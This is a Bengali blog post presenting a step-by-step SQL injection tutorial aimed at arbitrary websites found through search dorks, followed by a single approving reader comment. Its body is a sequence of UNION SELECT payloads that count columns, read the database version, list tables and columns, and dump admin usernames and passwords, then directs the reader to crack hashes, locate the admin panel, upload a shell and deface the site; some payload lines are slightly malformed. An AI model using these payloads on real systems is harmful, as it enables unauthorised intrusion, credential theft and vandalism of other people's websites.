হ্যাকিং পদ্ধতি গুলোর মধ্যে সবচেয়ে কার্যকর পদ্ধতি হচ্ছে SQLi Injection.
এই পদ্ধতিতে হ্যাকিং এর জন্য প্রথমে dork ব্যবহার করে SQLi vulnerable সাইট খুঁজে বের করতে হবে।
SQLi এর Dork এখানে।
আপনি যেকোনো dork ব্যবহার করতে পারেন, আপনার পছন্দ মতো।
সার্চ ফলাফল থেকে যেকোনো একটি সাইট নিয়ে তা পরীক্ষা করবো যে তা SQLi vulnerable কিনা।
মনেকরি, www.example.com/index.php?id=xx এই সাইট টি নিলাম।
এখন সাইটটির vulnerabilities পরীক্ষার জন্য xx এর আগে অথবা পরে ‘ Sign টি দিয়ে ওকে করলে যদি
“You have an syntax error” এমন error দেয় তাহলে বুঝতে হবে সাইট SQLi vulnerable.
এখন সাইটটির কলাম সংখ্যা বের করতে হবে। এজন্য লিখবো
www.example.com/index.php?id=xx order by 1 - -
অর্থাৎ xx এর পর শুধু order by 1 - - যোগ করবো। এখানে 1 হচ্ছে কলাম সংখ্যা।
(যারা মোবাইল থেকে করবেন তারা space এর বদলে + দিবেন)
যদি এতে কোন error না দেয় তবে লিখবো
www.example.com/index.php?id=xx order by 2 - - দিবো।
এভাবে কলাম সংখ্যা বৃদ্ধি করে অর্থাৎ 1,2,3,3,4,5…………… দিয়ে দেখতে থাকবো কোনটিতে error দেয়।
যখন order clause 500 এমন error দিবে তখন থামবো।
ধরুন কলাম সংখ্যা 6 এ উপরের মত error দিলো তাহলে বুঝতে হবে এর কলাম সংখ্যা 5 .
কলাম সংখ্যা পেলাম। এবার বের করবো কোন কলামটি vulnerable.
এর জন্য xx এর পর union select all ক্রমানুসারে কলাম সংখ্যা – লিখবো এবং xx এর আগে – sign টি দিবো। তাহলে লিঙ্কটি হবে
www.example.com/index.php?id=-xx union select all 1,2,3,4,5,6--
এখন ওয়েবপেজে কলাম সংখ্যার মধ্যে যে সংখ্যা গুলো দেখা যাবে তাই vulnerable কলাম।
একাধিক সংখ্যা দেখালে যেটি deep বা bold বা colord হবে সেটি নিবো।
ধরি উপরের সাইটটির ক্ষেত্রে কলাম সংখ্যা পেলাম 5 .
তাহলে 5 নম্বর কলামটির database version বের করবো।
তার জন্য লিখবো
www.example.com/index.php?id=-xx union select all 1,2,3,4,@@version,6- -
অর্থাৎ শুধু মাত্র 5 এর জায়গায় @@version লিখবো।
এখন দেখা যাবে ওয়েবপেজ এর যেই জায়গায় 5 লিখা আসছিল সেখানে database version (5.xx.xx -log) দেখাবে। যদি database version 5 হয় তাহলে continue করব, অন্যথায় সাইটটি বাদ দিবো। কারন এই পদ্ধতিটি database version 5 এর জন্য।
ধরে নেই database version 5 পাওয়া গেছে।
এবার সাইটটির টেবিল সংখ্যা বের করবো তার জন্য লিখবো
www.example.com/index.php?id=-xx union select all 1,2,3,4,group_concat(table_name),6 from information_schema.tables where table_schema=database()- -
ফলে যেইখানে database version লিখা আসছিলো, সেখানে টেবিল নাম আসবে নিচের মত...
এখান থেকে অনুমান করতে হবে কোন টেবিলটিতে ইউজার নাম এবং password থাকতে পারে।
উপরের টেবিল গুলোর মধ্যে admin টেবিলটি দেখে সহজেই বুঝা যায় যে admin এর মধ্যে username & password থাকতে পারে।
এখন admin টেবিল নামকে explore করে কলাম নাম বের করবো। এজন্য লিখবো
www.example.com/index.php?id=-xx union select all 1,2,3,4,group_concat(column_name),6 from information_schema.columns where table_name=0xhex code of admin- -
*** admin এর হেক্স কোড বের করবো
এখন কলাম নাম পাবো নিচের মতো...
কলাম নাম থেকে username & password বের করতে লিখবো
www.example.com/index.php?id=-xx union select all 1,2,3,4,group_concat((id,0x3a,user,0x3a,pass,0x3a,email),6 from যে টেবিল থেকে কলাম নাম পেয়েছি তার নাম - -
এখন নিচের মতো দেখাবে।
ব্যস পেয়ে গেলেন username & password .
( password যদি Hash কোডে বের হয় তাহলে Hash decrypte করুন এখান থেকে। )
Username & password দিয়ে সাইটটিতে লগইন করতে দরকার admin panel.
সাইটটির এডমিন প্যানেল বের করুন http://k213.cz/new/adminfinder.php এখান থেকে।
এডমিন প্যানেল পেয়ে গেলে লগইন করুন এবং সাইটে shell upload করে deface করুন।

1 comments:
nyc hoisa bro.. :)
একটি মন্তব্য পোস্ট করুন